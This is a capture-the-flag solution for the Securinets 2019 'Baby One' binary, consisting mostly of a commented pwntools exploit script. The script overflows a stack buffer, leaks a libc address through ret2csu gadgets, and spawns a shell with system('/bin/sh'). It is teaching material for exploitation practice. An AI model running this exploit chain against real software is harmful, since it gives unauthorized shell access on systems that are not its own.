Securinets Prequals CTF 2019 Baby One

Baby One

Binary File

[Problem]

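# Securinets Prequals 2019 "Baby One": ret2csu leak of write@libc, then ret2libc system("/bin/sh").
#
# Stage 1 overflows the stack buffer (56 bytes up to the saved return address), drives the
# __libc_csu_init gadget pair to call write(1, &write@got, 8) so libc's load address leaks,
# and returns into main so the same overflow can be triggered again.
# Stage 2 is a plain pop rdi; ret -> system("/bin/sh").
from pwn import *  # pwntools: process/remote, ELF, p64/u64

REMOTE = False  # flip to attack the remote service instead of a local copy of the binary
if REMOTE:
    r = remote('51.254.114.246', 1111)
else:
    r = process('./baby1')

e = ELF('./baby1', checksec=False)
# NOTE(review): e.libc is the *local* loader's libc. The write/system/"/bin/sh" offsets below
# are only valid against the remote service if it runs the same libc build; otherwise load the
# target's libc with ELF('<path-to-target-libc>') here (or identify it from the leaked address).
libc = e.libc

PAD = 56              # bytes from the start of the overflowed buffer to the saved RIP
pr = 0x4006c3         # pop rdi; ret (inferred from its use below: rdi <- "/bin/sh" before system)
csu_init1 = 0x4006B6  # __libc_csu_init tail: presumably add rsp,8; pop rbx,rbp,r12,r13,r14,r15; ret
csu_init2 = 0x4006A0  # __libc_csu_init loop: mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]

main_addr = e.symbols['main']
write_got = e.got['write']
write_os = libc.symbols['write']
system_os = libc.symbols['system']
# next() instead of .next() so the script runs under both Python 2 and 3 pwntools.
binsh_os = next(libc.search(b'/bin/sh'))

# ---- stage 1: leak write@libc via ret2csu ----
# csu_init1 pops rbx=0, rbp=1, r12=&write@got (call target), r13=8 (-> rdx, count),
# r14=&write@got (-> rsi, buf), r15=1 (-> edi, fd). csu_init2 then performs
# write(1, &write@got, 8); with rbx+1 == rbp its loop ends, and the seven zero qwords
# absorb the trailing add rsp,8 plus six pops before it returns into main.
payload = b''.join([
    b'A' * PAD,
    p64(csu_init1),
    b'A' * 8,         # skipped by the add rsp,8 at csu_init1 (layout relies on it)
    p64(0),           # rbx
    p64(1),           # rbp
    p64(write_got),   # r12 -> call [r12 + rbx*8] == write
    p64(8),           # r13 -> rdx (byte count)
    p64(write_got),   # r14 -> rsi (buffer to dump)
    p64(1),           # r15 -> edi (stdout)
    p64(csu_init2),
    p64(0) * 7,       # add rsp,8 + pop rbx,rbp,r12,r13,r14,r15 on the way out
    p64(main_addr),   # second run of main for the stage-2 overflow
])
r.recvline()          # banner printed by the first run of main
r.sendline(payload)

# write() dumps 8 bytes; only the low 6 carry address bits, the top 2 are zero.
# The 2 unread bytes stay in the receive buffer and are skipped by sendlineafter below.
leaked = u64(r.recv(6).ljust(8, b'\x00'))
libc_base = leaked - write_os
# Sanity check: a libc base is always page-aligned; anything else means the leak was
# mis-parsed or the libc offsets do not match the target.
if libc_base & 0xfff:
    raise RuntimeError('libc base %#x is not page-aligned: wrong libc offsets?' % libc_base)
print('libc base: %#x' % libc_base)
system_addr = libc_base + system_os
binsh_addr = libc_base + binsh_os

# ---- stage 2: system("/bin/sh") ----
# NOTE(review): if system() crashes on a movaps instruction, rsp is misaligned on entry;
# insert one extra plain `ret` gadget before pr to realign the stack to 16 bytes.
payload = b''.join([
    b'A' * PAD,
    p64(pr),
    p64(binsh_addr),
    p64(system_addr),
])
r.sendlineafter(b'\n', payload)   # wait for main's banner to be printed again
r.interactive()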
[Exploit Code]
